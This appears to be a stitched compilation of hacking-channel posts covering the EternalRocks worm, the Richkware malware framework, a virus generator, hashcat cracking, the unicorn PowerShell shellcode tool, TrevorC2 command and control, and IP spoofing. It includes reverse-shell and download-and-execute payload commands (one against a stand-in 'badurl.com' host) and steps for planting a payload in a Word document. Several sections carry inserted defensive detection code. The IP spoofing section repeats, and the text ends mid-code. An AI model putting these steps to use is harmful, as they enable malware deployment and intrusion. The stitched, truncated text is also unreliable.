โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
EternalRocks worm (virus): Windows hack tool breakdown
> MicroBotMassiveNet
instagram.com/UndercOdeTestingCompany
> It spreads through the public SMB exploits from The Shadow Brokers NSA dump: ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE and ETERNALSYNERGY, along with the related programs DOUBLEPULSAR, ARCHITOUCH and SMBTOUCH.
» taskhost.exe properties
> The first-stage malware UpdateInstaller.exe (obtained through remote exploitation, together with the second-stage malware) downloads the .NET components needed by later stages, TaskScheduler and SharpZLib, from the Internet, while dropping svchost.exe and taskhost.exe. The svchost.exe component downloads, unpacks and runs Tor from archive.torproject.org and handles the C&C communication with ubgdgno5eswkhmpy[.]onion, requesting further instructions (e.g. installation of new components).
INSTALLATION & RUN:
1) Downloading required .NET components (first stage)
> http://api.nuget.org/packages/taskscheduler.2.5.23.nupkg
> http://api.nuget.org/packages/sharpziplib.0.86.0.nupkg # in newer variants
2) Appendix
> Decompilation of an older sample
C# source # 1ee894c0b91f3b2f836288c22ebeab44798f222f17c255f557af2260b8c6a32d
3) Globals
> Network traffic capture (PCAP)
4) Windows 7 x64 SP1 Honeypot # initial exploitation capture
5) Yara rules
> EternalRocks.yara
๐ฆ Debug strings
> C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
> C:\Users\tmc\Documents\DownLoader\Project1.vbp
> C:\Users\tmc\Documents\TorUnzip\Project1.vbp
> c:\Users\tmc\Documents\Visual Studio 2015\Projects\MicroBotMassiveNet\taskhost\obj\x86\Debug\taskhost.pdb
> C:\Users\tmc\Documents\Visual Studio 2015\Projects\WindowsServices\svchost\bin\svchost.pdb
6) Now Download .zip file
> https://github.com/stamparm/EternalRocks/archive/master.zip
File paths
> c:\Program Files\Microsoft Updates\
> Scheduled tasks
> ServiceHost -> C:\Program Files\Microsoft Updates\svchost.exe # system start, log on, daily
> TaskHost -> C:\Program Files\Microsoft Updates\taskhost.exe # system start, log on, daily
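As an added defender-side check (not from the post or the EternalRocks repository), the following Python matches a scheduled-task export and a file image against the indicators listed above: the drop directory, the two task names and the debug/PDB strings. The task list and the file image are constructed sample input; the one assumption beyond the post is that svchost.exe and taskhost.exe are legitimate only under the Windows system directories.

```python
from typing import Dict, List, Tuple

# Indicators quoted in the post: the drop directory, the two scheduled task
# names and the project/PDB paths left in the binaries.
DROP_DIR = "c:\\program files\\microsoft updates\\"
TASK_NAMES = {"servicehost", "taskhost"}
DEBUG_STRINGS = [
    "MicroBotMassiveNet\\taskhost\\obj\\x86\\Debug\\taskhost.pdb",
    "WindowsServices\\svchost\\bin\\svchost.pdb",
    "Documents\\DownLoader\\Project1.vbp",
    "Documents\\TorUnzip\\Project1.vbp",
]
# The worm reuses the names of two legitimate Windows binaries, so the check
# keys on the path, not the file name. Assumption: these names are legitimate
# only under the system directories below.
MIMICKED = {"svchost.exe", "taskhost.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _executable(command: str) -> str:
    """Extract the program path from a task action, lower-cased, arguments dropped."""
    cmd = command.strip()
    if cmd.startswith('"'):
        return cmd[1:].split('"', 1)[0].lower()
    low = cmd.lower()
    end = low.find(".exe")
    return low[: end + 4] if end != -1 else low.split(" ", 1)[0]


def check_task(task_name: str, command: str) -> List[str]:
    """Return the reasons a scheduled task matches the EternalRocks indicators."""
    reasons: List[str] = []
    exe = _executable(command)
    base = exe.rsplit("\\", 1)[-1]
    if exe.startswith(DROP_DIR):
        reasons.append("runs from the EternalRocks drop directory")
    if base in MIMICKED and not exe.startswith(SYSTEM_DIRS):
        reasons.append(f"{base} outside the system directory")
    # The task name alone is weak evidence; only count it with a path finding.
    if task_name.strip("\\").lower() in TASK_NAMES and reasons:
        reasons.append("task name matches the EternalRocks persistence tasks")
    return reasons


def triage_tasks(tasks: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious task name to its reasons; clean tasks are omitted."""
    findings: Dict[str, List[str]] = {}
    for name, command in tasks:
        reasons = check_task(name, command)
        if reasons:
            findings[name] = reasons
    return findings


def find_debug_strings(blob: bytes) -> List[str]:
    """Report which of the post's debug/PDB strings occur in a file image."""
    text = blob.decode("latin-1").lower()
    return [s for s in DEBUG_STRINGS if s.lower() in text]


# Constructed sample input (not captured data): a schtasks-style export as
# (task name, command) pairs, and a fake file image carrying one PDB path.
SAMPLE_TASKS = [
    ("\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "C:\\Windows\\system32\\defrag.exe -c"),
    ("\\ServiceHost", "\"C:\\Program Files\\Microsoft Updates\\svchost.exe\""),
    ("\\TaskHost", "C:\\Program Files\\Microsoft Updates\\taskhost.exe"),
    ("\\Backup", "C:\\Windows\\System32\\taskhost.exe $(Arg0)"),
]
SAMPLE_IMAGE = (b"MZ\x90\x00" + b"\x00" * 32 +
                b"c:\\Users\\tmc\\Documents\\Visual Studio 2015\\Projects\\"
                b"MicroBotMassiveNet\\taskhost\\obj\\x86\\Debug\\taskhost.pdb\x00")

if __name__ == "__main__":
    for name, reasons in triage_tasks(SAMPLE_TASKS).items():
        print(name, "->", "; ".join(reasons))
    print("debug strings:", find_debug_strings(SAMPLE_IMAGE))
```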
@ Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Richkware: framework for building Windows malware, written in C++ (2019 new release)
> Richkware is a library of network and OS functions that you can use to create malware. Combining these functions lets an application take on behaviours characteristic of the following types of malware:
> Virus / Worm / Bot / Spyware / Keylogger / Scareware
t.me/UndercOdeTestingCompany
INSTALLATION & RUN:
1) git clone https://github.com/richkmeli/Richkware
2) cd Richkware
3) Open main.cpp, and create an instance of Richkware.
4) With Richkware-Manager-Server
If you have deployed RMS, you can initialize the malware as follows:
    int main() {
        Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
        ...
        return 0;
    }
5) Otherwise, if you haven't deployed RMS, you can use:
    Richkware richkware("Richk","richktest");
In this way, it uses "richktest" as the encryption key.
6) Compiling:
> Using MinGW for Windows or the MinGW cross compiler in a Linux build environment:
    make
> Using the Microsoft C++ compiler (Visual Studio):
> C/C++ > Preprocessor > Preprocessor Definitions, add "_CRT_SECURE_NO_WARNINGS"
> Linker > Input > Additional Dependencies, add "Ws2_32.lib"
7) Remote Command Execution
Call the framework's StartServer function in main (richkware.network.server.Start in the example below); it starts a server on a port, TCP port 8000 in this example. Remember that if a port is already in use by another program, you can't use that port until that program is stopped.
    int main () {
        ...
        richkware.network.server.Start("8000");
        ...
    }
8) Connect from a terminal on Unix systems
On Unix systems, you can use netcat and run the following command:
> nc <serverName> 8000
9) Connect from a terminal on Windows
On Windows, you can use telnet in the same way:
> telnet <serverName> 8000
E N J O Y
WRITTEN BY Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Install ADB & FastBoot Tools in Termux!
2019
t.me/UndercOdeTestingOfficial
INSTALLATION & RUN:
A) Silent installation:
1) Copy and paste the following command in Termux to silently install the tools:
> apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash InstallTools.sh
B) Common installation:
1) Copy and paste the following command in Termux to install the tools with log output:
> apt update && apt install wget && wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh
Tested
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
How To Compress / Decompress Brawl Stars SC files on Windows / Linux / Android!
instagram.com/UnderCodeTestingCompany
INSTALLATION & RUN:
> On Windows:
1) Download Python 3.5 or a newer version from the official page.
>https://www.python.org/downloads/
2) Install Python. While installing, enable the options "Add Python to PATH", "Install pip", "Install py launcher", "Associate files with Python" and "Add Python to environment variables".
3) Download XCoder from the releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) Execute the "Init.py" file to install the required modules and create the workspace directories.
On Linux:
1) Open a terminal and install Python by executing the following command:
> sudo apt-get update && sudo apt-get install python3 python3-pip
2) Download XCoder from the releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
3) Execute the "Init.py" file to install the required modules and create the workspace directories.
On Android:
1) Download and install the PyDroid app from Google Play.
> https://play.google.com/store/apps/details?id=ru.iiec.pydroid3
2) Open PyDroid and wait until Python installs.
3) Download XCoder from the releases page and extract it.
> https://github.com/MasterDevX/XCoder/releases
4) In PyDroid, open and execute the "Init.py" file to install the required modules and create the workspace directories.
How to use
> To compile SC:
1) Put folders named after the texture, with the .png files inside them, in the "In-Decompressed-SC" directory and execute the "SC-Encode.py" script. After the process finishes, your .sc files will appear in the "Out-Compressed-SC" folder.
> To decompile SC:
2) Put .sc files in the "In-Compressed-SC" directory and execute the "SC-Decode.py" script. After the process finishes, your .png files will appear in the "Out-Decompressed-SC" folder.
Tested by UndercOde on:
> Windows Server Essentials
> Android 8.0
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
WIN32/SIREFEF VIRUS: I just tested this virus and its effect on Windows at UndercOde; I declare:
t.me/UndercOdeTestingOfficial
LET'S START:
> This family of malware uses stealth to hide its presence on your PC. Trojans in this family can do different things, including:
1) Downloading and running other files
2) Contacting remote hosts
3) Disabling security features
4) Members of the family can also change search results, which can generate money for the hackers who use Sirefef.
> Variants of Win32/Sirefef might be installed by other malware, including variants of the Trojan:Win32/Necurs family.
5) This kind of dangerous virus can't be removed easily.
> In addition, anti-virus apps detect and remove the whole file; the virus can't be removed from those files by anti-virus apps.
Written by Steaven
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
How to Create a Virus on Termux/Linux Without Root - simple example
instagram.com/UndercodeTestingCompany
INSTALLATION & RUN:
1) apt update && apt upgrade
2) apt install git
3) apt install python && apt install python2
4) git clone https://github.com/TheReaper167/Malicious
5) cd Malicious
6) pip2 install -r requirements.txt
7) pip2 install requests
8) python2 malicious.py
9) After downloading the virus, open your file explorer
10) Find the Malicious folder and open it
11) Choose and open the Android folder if you downloaded the Android virus
Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Automate Cracking
For Linux & root termux
t.me/UndercOdeTestingOfficial
INSTALLATION & RUN:
1) mkdir -p hashcat/deps
2) git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
3) cd hashcat/
4) make
5) make install
6) python wordlist_optimizer.py <input file list> <output directory>
7) python wordlist_optimizer.py wordlists.txt ../optimized_wordlists
8) hashcat --help | grep -i ntlm
   5500 | NetNTLMv1       | Network protocols
   5500 | NetNTLMv1 + ESS | Network protocols
   5600 | NetNTLMv2       | Network protocols
   1000 | NTLM            | Operating-Systems
Features:
(1) Quick Crack
(2) Extensive Pure_Hate Methodology Crack
(3) Brute Force Attack
(4) Top Mask Attack
(5) Fingerprint Attack
(6) Combinator Attack
(7) Hybrid Attack
(8) Pathwell Top 100 Mask Brute Force Crack
(9) PRINCE Attack
(10) YOLO Combinator Attack
(11) Middle Combinator Attack
(12) Thorough Combinator Attack
Tested by UndercOde on:
> Ubuntu
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
New 2019 release of a tool for performing a PowerShell downgrade attack and injecting shellcode straight into memory
> You will need a place that supports remote command injection of some sort. Often this could be through an Excel/Word doc, through psexec_commands inside of Metasploit, SQLi, etc. There are many implications and scenarios in which you can use this attack.
> use for learning only
instagram.com/UndercOdeTestingCompany
INSTALLATION & RUN:
1) git clone https://github.com/trustedsec/unicorn
2) cd unicorn
3) python unicorn.py
4) Commands:
> python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
> PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
> PS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe
> Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
> Macro Example CS: python unicorn.py <cobalt_strike_file.cs> cs macro
> Macro Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode macro
> HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta
> HTA Example CS: python unicorn.py <cobalt_strike_file.cs> cs hta
> HTA Example Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode hta
> DDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde
> CRT Example: python unicorn.py <path_to_payload/exe_encode> crt
> Custom PS1 Example: python unicorn.py <path to ps1 file>
> Custom PS1 Example: python unicorn.py <path to ps1 file> macro 500
> Cobalt Strike Example: python unicorn.py <cobalt_strike_file.cs> cs (export CS in C# format)
> Custom Shellcode: python unicorn.py <path_to_shellcode.txt> shellcode (formatted 0x00)
> Help Menu: python unicorn.py --help
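As an added detection example (not from the post or the unicorn project), the following Python runs command-line heuristics for the PowerShell downgrade described above over process-creation events: a launcher that forces the PowerShell 2.0 engine, hides the window, skips the profile and passes an encoded command. The heuristic patterns are my assumptions about what such a one-liner looks like, not the tool's actual output, and the event lines are constructed.

```python
import re
from typing import Dict, List

# Heuristics for the launcher behaviour named in the post: forcing the
# PowerShell 2.0 engine (which predates script block logging and AMSI),
# hiding the window, skipping the profile and passing a base64 command.
# These patterns are assumptions for this example, not Unicorn's output.
DOWNGRADE = re.compile(r"(?i)(?:^|\s)[-/](?:v|ver|version)\s+2(?:\.0)?(?=\s|$)")
HIDDEN = re.compile(r"(?i)(?:^|\s)[-/](?:w|win|windowstyle)\s+(?:hidden|1)(?=\s|$)")
ENCODED = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
QUIET = re.compile(r"(?i)(?:^|\s)[-/](?:nop|noprofile|noni|noninteractive)(?=\s|$)")
INMEMORY = re.compile(r"(?i)\bIEX\b|Invoke-Expression|VirtualAlloc|CreateThread|FromBase64String")

# Field extractor for the constructed event format below.
CMDLINE = re.compile(r'CommandLine="([^"]*)"')


def score_command(cmdline: str) -> Dict[str, object]:
    """Return the matched heuristics and a verdict for one process command line."""
    reasons: List[str] = []
    if "powershell" not in cmdline.lower():
        return {"reasons": reasons, "suspicious": False}
    if DOWNGRADE.search(cmdline):
        reasons.append("engine downgrade to v2")
    if HIDDEN.search(cmdline):
        reasons.append("hidden window")
    if ENCODED.search(cmdline):
        reasons.append("encoded command")
    if QUIET.search(cmdline):
        reasons.append("no profile / non-interactive")
    if INMEMORY.search(cmdline):
        reasons.append("in-memory execution API")
    # A downgrade alone is worth an alert; otherwise require two weaker signals,
    # because -NoProfile or -WindowStyle on their own are common in admin scripts.
    suspicious = "engine downgrade to v2" in reasons or len(reasons) >= 2
    return {"reasons": reasons, "suspicious": suspicious}


def scan_events(log: str) -> List[Dict[str, object]]:
    """Run the heuristics over process-creation events and return the hits."""
    hits: List[Dict[str, object]] = []
    for line in log.splitlines():
        match = CMDLINE.search(line)
        if not match:
            continue
        result = score_command(match.group(1))
        if result["suspicious"]:
            hits.append({"cmdline": match.group(1), **result})
    return hits


# Constructed process-creation events (Sysmon-style fields, not real captures).
SAMPLE_EVENTS = "\n".join([
    'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"',
    'EventID=1 Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c powershell -nop -w hidden -noni -version 2 -c IEX $env:x"',
    'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -w 1 -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"',
    'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -NoProfile -Command Get-Service"',
])

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(hit["cmdline"], "->", ", ".join(hit["reasons"]))
```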
To apply the payload:
1) Open Word
2) Insert tab -> Quick Parts -> Field
3) Choose = (Formula) and click ok.
4) Once the field is inserted, you should now see "!Unexpected End of Formula"
5) Right-click the Field, choose "Toggle Field Codes"
6) Paste in the code from Unicorn
7) Save the Word document.
E N J O Y
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
TrevorC2 - Command and Control via Legitimate Behavior over HTTP
instagram.com/UndercOdeTestingCompany
INSTALLATION & RUN:
1) git clone https://github.com/trustedsec/trevorc2
2) cd trevorc2
3) pip install -r requirements.txt
4) trevor2_server.py
> Edit the file first and customize which website you want to clone, etc. The server clones a website of your choosing and stands up a server. This server is browsable by anyone and looks like a legitimate website. Contained within the page source is a parameter (again configurable) that carries the instructions for the client. Once a client connects, it searches for that parameter, then uses it to execute commands.
5) trevor2_client.py
> All a client needs, in any configurable option, is the ability to call out to a website, parse some basic data, execute a command, and then put the results in a base64-encoded query string parameter sent back to the site. That's it, not hard.
6) trevor2_client.ps1
> PowerShell implementation of trevor2_client.py; this allows you to use native PowerShell to interact with Trevor2_Server.
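The client behaviour described above leaves a recognisable trace in web proxy logs: repeated requests to one host carrying a base64-decodable query parameter at a steady interval. The following Python is an added detection example (not from the post or the TrevorC2 project) that runs that logic over constructed proxy log lines; the log format, parameter name and intervals are assumptions for the sample.

```python
import base64
import binascii
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, quote, urlsplit


def encode_result(text: str) -> str:
    """Base64 then URL-encode, as a client must do to carry output in a query string."""
    return quote(base64.b64encode(text.encode()).decode(), safe="")


# Constructed proxy log lines "timestamp client method url" (not captured data).
# 10.0.0.7 behaves like the client described above: it fetches the cloned site
# and returns command output in a base64 query parameter every 30 seconds.
SAMPLE_LOG = "\n".join([
    "2019-06-01T10:00:00 10.0.0.5 GET http://www.example.com/index.html",
    "2019-06-01T10:00:03 10.0.0.5 GET http://www.example.com/search?q=how+to+configure+a+firewall",
    "2019-06-01T10:00:10 10.0.0.7 GET http://www.example.com/?guid=" + encode_result("whoami: corp\\bob\r\n"),
    "2019-06-01T10:00:40 10.0.0.7 GET http://www.example.com/?guid=" + encode_result("hostname: WIN10-BOB\r\n"),
    "2019-06-01T10:01:10 10.0.0.7 GET http://www.example.com/?guid=" + encode_result("cd: C:\\Users\\bob\r\n"),
    "2019-06-01T10:05:00 10.0.0.5 GET http://www.example.com/login?sid=3f2a9c0d1b4e5f6a7b8c9d0e1f2a3b4c",
])


def decodes_to_text(value: str, min_len: int = 16) -> bool:
    """True if value is strict base64 whose decoded bytes look like text output."""
    if len(value) < min_len:
        return False
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    return bool(raw) and printable >= 0.9 * len(raw)


def find_beacons(log: str, min_hits: int = 3, max_jitter: float = 0.25) -> List[Dict[str, object]]:
    """Group base64-carrying requests by (client, host, parameter); keep the regular ones."""
    stamps: Dict[Tuple[str, str, str], List[datetime]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(" ", 3)
        parts = urlsplit(url)
        for name, value in parse_qsl(parts.query):
            if decodes_to_text(value):
                stamps[(client, parts.hostname, name)].append(datetime.fromisoformat(ts))
    beacons: List[Dict[str, object]] = []
    for (client, host, param), times in stamps.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Relative spread of the gaps: a scripted check-in is far more regular
        # than a person clicking through a site.
        jitter = (max(gaps) - min(gaps)) / mean if mean else 0.0
        if jitter <= max_jitter:
            beacons.append({"client": client, "host": host, "param": param,
                            "count": len(times), "interval_s": mean})
    return beacons


if __name__ == "__main__":
    for beacon in find_beacons(SAMPLE_LOG):
        print(beacon)
```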
Dockerfile:
1) git clone https://github.com/trustedsec/trevorc2.git
2) cd trevorc2
# At this point, setting up docker-machine to remotely deploy works great
3) docker build -t trevorc2 .
4) docker run -it -p 80:80 -p 443:443 trevorc2
USE FOR LEARNING ONLY
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Test WPA3 using virtual Wi-Fi interfaces
t.me/undercOdeTestingOfficial
INSTALLATION & RUN:
1) git clone https://github.com/vanhoefm/hostap-wpa3
2) cd hostap-wpa3/hostapd
3) cp defconfig .config
4) make -j 2
5) cd ..
6) Now for wpa_supplicant:
> cd wpa_supplicant
7) cp defconfig .config
8) make -j 2
9) sudo modprobe mac80211_hwsim radios=3
> rfkill unblock wifi
10) Optionally kill other Wi-Fi clients the brute-force way:
> sudo pkill wpa_supplicant
11) Open a new terminal, and in the directory hostapd execute:
> sudo ./hostapd hostapd_wpa3.conf -dd -K
12) Open another terminal, and in the directory wpa_supplicant execute:
> sudo ./wpa_supplicant -D nl80211 -i wlan1 -c supp_wpa3.conf -dd -K
Written by Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
IP Spoofing FULL:
The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial
Why it works?
IP spoofing works because trusted services rely only on network-address-based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is a security weakness in the TCP protocol known as sequence number prediction.
How it works?
To completely understand how IP spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.
Internet Protocol (IP):
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
> Examining the IP header, we can see that the first 12 bytes (the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows), however, contain the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses, specifically the "source address" field.
Transmission Control Protocol (TCP):
It is the connection-oriented, reliable transport protocol in the TCP/IP suite. Connection-oriented simply means that the two hosts participating in a discussion must first establish a connection via the 3-way handshake (SYN-SYN/ACK-ACK). Reliability is provided by data sequencing and acknowledgement. TCP assigns sequence numbers to every segment and acknowledges any and all data segments received from the other end.
> The first 12 bytes of the TCP header contain the port and sequencing information.
> TCP sequence numbers can simply be thought of as 32-bit counters. They range from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header will contain the sequence number of the *first* byte of data in the TCP segment. The acknowledgement number field in the TCP header holds the value of the next *expected* sequence number, and also acknowledges *all* data up through this ACK number minus one.
> TCP packets can be manipulated using several packet crafting tools available on the Internet.
The Attack
IP spoofing consists of several steps. First, the target host is chosen. Next, a pattern of trust is discovered, along with a trusted host. The trusted host is then disabled, and the target's TCP sequence numbers are sampled. The trusted host is impersonated, the sequence numbers guessed, and a connection attempt is made to a service that only requires address-based authentication. If successful, the attacker executes a simple command to leave a backdoor.
> Spoofing can be implemented in different ways, as given below:
Non-Blind Spoofing: This type of attack takes place when the attacker is on the same subnet as the victim. The sequence and acknowledgement numbers can be sniffed, eliminating the potential difficulty of calculating them accurately.
Blind Spoofing: Here the sequence and acknowledgement numbers are unreachable. In order to circumvent this, several packets are sent to the target machine in order to sample sequence numbers.
Usage:
IP spoofing is almost always used in what is currently one of the most difficult attacks to defend against: Denial of Service attacks, or DoS.
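As an added illustration (not part of the original post), the following Python models the sequence/acknowledgement accounting described above, including the 32-bit wrap-around, and contrasts the predictable initial sequence number (ISN) generation that makes sequence number prediction possible with the keyed per-connection scheme of RFC 6528 that defends against it. The generators, the secret and the connection 4-tuples are constructed for the example.

```python
import hashlib
import hmac
from typing import List, Tuple

MASK = 0xFFFFFFFF  # sequence numbers are 32-bit counters: 0 .. 4,294,967,295


def add32(seq: int, n: int) -> int:
    """Advance a sequence number with 32-bit wrap-around."""
    return (seq + n) & MASK


def handshake_and_send(client_isn: int, server_isn: int, payload_len: int) -> List[Tuple[str, int, int]]:
    """Model the 3-way handshake plus one data segment as (segment, seq, ack) triples.

    SYN occupies one sequence number, so the peer acknowledges ISN + 1. After a
    payload of L bytes starting at seq S, the ACK carries S + L, which
    acknowledges every byte up to S + L - 1 as the text above states.
    """
    c1 = add32(client_isn, 1)
    s1 = add32(server_isn, 1)
    return [
        ("SYN", client_isn, 0),
        ("SYN/ACK", server_isn, c1),
        ("ACK", c1, s1),
        ("DATA", c1, s1),                        # client sends payload_len bytes
        ("ACK", s1, add32(c1, payload_len)),     # server acknowledges them
    ]


class IncrementingISN:
    """The weakness the text describes: each new ISN is the previous one plus a constant."""

    def __init__(self, start: int = 0, step: int = 64000) -> None:
        self.value, self.step = start, step

    def next(self, *_connection: object) -> int:
        self.value = add32(self.value, self.step)
        return self.value


class KeyedISN:
    """RFC 6528-style mitigation: a clock term plus a keyed hash of the 4-tuple.

    The secret never leaves the host, so an observer who samples ISNs from their
    own connections learns nothing about the ISN another 4-tuple will receive.
    """

    def __init__(self, secret: bytes, tick: int = 250000) -> None:
        self.secret, self.tick, self.clock = secret, tick, 0

    def next(self, src: str, sport: int, dst: str, dport: int) -> int:
        self.clock = add32(self.clock, self.tick)  # stands in for the time component
        msg = f"{src}:{sport}->{dst}:{dport}".encode()
        f = int.from_bytes(hmac.new(self.secret, msg, hashlib.sha256).digest()[:4], "big")
        return add32(self.clock, f)


def predictable_fraction(generator, connections: List[Tuple[str, int, str, int]]) -> float:
    """Share of ISNs an observer guesses exactly by extrapolating the last two samples."""
    isns = [generator.next(*c) for c in connections]
    hits = 0
    for i in range(2, len(isns)):
        step = (isns[i - 1] - isns[i - 2]) & MASK
        hits += add32(isns[i - 1], step) == isns[i]
    return hits / (len(isns) - 2)


# Constructed connection 4-tuples (client, port, server, port); not from the page.
CONNECTIONS = [("203.0.113.9", 40000 + i, "198.51.100.20", 2000) for i in range(20)]

if __name__ == "__main__":
    for segment in handshake_and_send(0xFFFFFFFE, 1000, 100):
        print(segment)
    print("incrementing ISN predictable:", predictable_fraction(IncrementingISN(), CONNECTIONS))
    print("keyed ISN predictable:", predictable_fraction(KeyedISN(b"constructed-secret"), CONNECTIONS))
```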
@Mr. BOTNET (tm)
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆIP Spoofing FULL :
The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.
T.me/UnderCodeTestingOfficial
๐ฆWhy it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.
๐ฆHow it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process.
๐ฆInternet Protocol (IP) :
IP is a network protocol operating at layer 3 (network) of the OSI model. It is connectionless, meaning that no information about transaction state is kept; it is used only to route packets across a network. Additionally, there is no mechanism to ensure that a packet is actually delivered to its destination.
> Examining the IP header, the first 12 bytes (the top 3 rows of the header) contain various information about the packet. The next 8 bytes (the next 2 rows) contain the source and destination IP addresses. Using one of several tools, an attacker can easily modify these addresses, specifically the "source address" field.
๐ฆTransmission Control Protocol (TCP) :
TCP is the connection-oriented, reliable transport protocol of the TCP/IP suite. Connection-oriented means that the two hosts participating in an exchange must first establish a connection via the 3-way handshake (SYN, SYN/ACK, ACK). Reliability is provided by data sequencing and acknowledgement: TCP assigns sequence numbers to every segment and acknowledges all data segments received from the other end.
> As shown in the TCP header diagram above, the first 12 bytes of the TCP header contain the port and sequencing information.
> TCP sequence numbers can simply be thought of as 32-bit counters, ranging from 0 to 4,294,967,295. Every byte of data exchanged across a TCP connection (along with certain flags) is sequenced. The sequence number field in the TCP header contains the sequence number of the *first* byte of data in the segment. The acknowledgement number field holds the value of the next *expected* sequence number, and thereby acknowledges *all* data up through this ACK number minus one.
> TCP packets can be manipulated using any of several packet-crafting tools available on the internet.
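As an added example (not part of the original post), the following Python builds and parses constructed TCP segments and walks the 3-way handshake plus one data segment, showing how the acknowledgement number equals the next expected sequence number, how a SYN consumes one sequence number, and why a 32-bit counter has to be compared modulo 2^32 rather than with a plain less-than. The ports, initial sequence numbers and payload are constructed sample values; the checksum is left at zero because computing it needs the IP pseudo-header.

```python
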